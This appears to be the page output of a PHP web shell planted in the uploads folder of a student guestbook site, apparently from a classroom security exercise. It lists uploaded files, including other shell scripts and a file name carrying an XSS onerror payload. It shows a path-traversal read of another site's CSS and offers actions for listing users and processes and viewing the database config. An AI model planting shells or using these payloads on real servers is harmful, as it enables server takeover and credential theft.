🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../574486.klas4s23.mid-ica.nl/public_html/Gastenlijst/style.css

body {
  font-size: 16px; /* Set a base font size */
  line-height: 1.5; /* Set a base line height */
  margin: 0;
  padding: 0px;
  font-family: 'Arial', sans-serif; /* Choose a font family */
  height: 100vh;
  background: linear-gradient(45deg, #C1AE7C, #5C5552, #433633, #C1AE7C);
  background-size: 300% 300%;
  animation: color 12s ease-in-out infinite;
}

@font-face {
  font-family: sora;
  src: url(fonts/Sora-Bold.ttf);
}

.button-tekst{
  font-family: 'sora';
}
.title h1{
  margin: 0;
}


.container{
  height: 100%;
  width: 100%;



}

.content{

}

@keyframes color{
  0%{
    background-position: 0 50%
  }
  50%{
    background-position: 100% 50%
  }
  100%{
    background-position: 0 50%
  }
}

.gastenboek{
  font-size: 50px;
  text-align: center;
  padding: 0px;
  margin: 20px;
}
.navigationbar {
    list-style-type: none;
    margin: 0;
    padding: 0;
    font-family: 'sora';
  }

 .navigationbar > ul {
    list-style-type: none;
    margin: 0;
    padding: 0;
    /* width: 200px; */
    background-color: #C1AE7C;
    display: flex;
    flex-direction: row;

  }

  .navigationbar > li {
    display: flex;
    /* width: ; */
    
  }
  
  .navigationbar >a {
    display: block;
    padding: 8px;
    background-color: #C1AE7C;

    
  }


  .navigationbar >ul {
    list-style-type: none;
    margin: 0;
    padding: 0;
    overflow: hidden;
    background-color: #C1AE7C;
 
  }
  
  body {
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 0;
}

.reviews-container {
    display: flex;
    justify-content: space-between;
    padding: 20px;
    margin-top: 100px;

}

#reviews-container-form{
  margin-top: 50px;
}

.review {
    width: 30%;
    background-color: rgba(193, 174, 124,);
    padding: 15px;
    margin: 10px;
    border-radius: 8px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 1.0);
}

.review h3 {
    margin-bottom: 10px;
}

  
  li a {
    display: block;
    color: rgb(255, 248, 248);
    text-align: center;
    padding: 18px 16px;
    text-decoration: none;
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
  }


  
  /* Change the link color to #111 (black) on hover */
  li a:hover {
    background-color: #433633;
    transition: 0.5s;
  }



  .feedback-input {
    color: #222;
    font-family: Helvetica, Arial, sans-serif;
    font-weight: 500;
    font-size: 18px;
    border-radius: 5px;
    line-height: 22px;
    background-color: white;
    border: 2px solid #2c2b2b;
    transition: all 0.3s;
    padding: 13px;
    margin-top: 10px;
    margin-bottom: 15px;
    width: 100%;
    box-sizing: border-box;
    outline: 0;
  }
  
  .feedback-input:focus {
    border: 2px solid #291980;
  }
  
  textarea {
    height: 150px;
    line-height: 150%;
    resize: vertical;
  }
  
  [type="submit"] {
    font-family: "Montserrat", Arial, Helvetica, sans-serif;
    width: 100%;
    background: #2c2b2b;
    border-radius: 5px;
    border: 0;
    cursor: pointer;
    color: white;
    font-size: 24px;
    padding-top: 10px;
    padding-bottom: 10px;
    transition: all 0.3s;
    margin-top: -4px;
    font-weight: 700;
  }

  .form{
    margin-left: 20px;
    margin-right: 20px;
  }
  
  [type="submit"]:hover {
    background: #291980;
  }

.overlay-content {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    text-align: center;
    color: #fff;
    
}


.textarea{
  display: flex;
  justify-content: center;
  margin-left: auto;
  margin-right: auto;

  top: px; /* Adjust the distance from the top */
  left: 570px; /* Adjust the distance from the left */
  border: 10px solid #686565; 
  padding: 20px;
  border-radius: 30px;
  background-color: #817c7c;
  font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}


#tekstmessages{

  margin-left: 200px;
}

.video-container {
  position: relative;
  width: 100%;
  overflow: hidden;
  justify-content: center; /* Center horizontally */
  align-items: center; /* Center vertically */
  display: flex;
}

.video-container video {
  position: relative;
  width: 130%; /* Adjust the width as needed */
  height: 50vh; /* Adjust the height as needed */

}

.black-filter {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background-color: black;
  opacity: 0.9; /* Adjust opacity as needed */
}

.middenstuk{
  text-align: center; /* Aligns content center horizontally */
  margin-top: 50px; /* Adjust margin top as needed */
}
.middenbutton{
  

  display: block;
  outline: 0;
  border: 0;
  margin: 0 auto; /* Centers the button horizontally */
  cursor: pointer;
  will-change: box-shadow,transform;
  background: radial-gradient( 100% 100% at 100% 0%, #C1AE7C 0%, #5C5552 100% );
  box-shadow: 0px 2px 4px rgba(193, 174, 124, 0.4), 0px 7px 13px -3px rgba(193, 174, 124, 0.3), inset 0px -3px 0px rgba(193, 174, 124, 0.5);
  padding: 0 200px;
  border-radius: 6px;
  color: #fff;
  height: 78px;
  width: 100px;
  font-size: 18px;
  font-family: 'sora';
  text-shadow: 0 1px 0 rgb(0 0 0 / 40%);
  transition: box-shadow 0.15s ease,transform 0.15s ease;
  :hover {
      box-shadow: 0px 4px 8px rgb(45 35 66 / 40%), 0px 7px 13px -3px rgba(204, 202, 75, 0.3), inset 0px -3px 0px #000000;
      transform: translateY(-2px);
  }
  :active{
      box-shadow: inset 0px 3px 7px #3c4fe0;
      transform: translateY(2px);
  }
}

#formbutton{
  margin: 2px;
}

.button-tekst {
  display: flex;
  justify-content: center; /* Center items horizontally */
  margin: auto; /* Center the whole container horizontally */
  margin-top: 200px;
  color: #c29f40;
  font-size: larger;
  text-shadow: 2px 2px 4px rgba(104, 92, 64, 0.5);
}


.upload-container {
    position: relative;
    width: 200px;
    margin: 20px auto;
}

.upload-label {
    display: block;
    width: 100%;
    height: 40px;
    line-height: 40px;
    text-align: center;
    background-color: #3498db;
    color: #fff;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.3s ease;
}

.upload-label:hover {
    background-color: #2980b9;
}

#imageUpload {
    display: none;
}

.image-preview {
    margin-top: 10px;
    width: 100%;
    height: 200px;
    border: 1px solid #ccc;
    border-radius: 5px;
    background-size: cover;
    background-position: center;
}

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!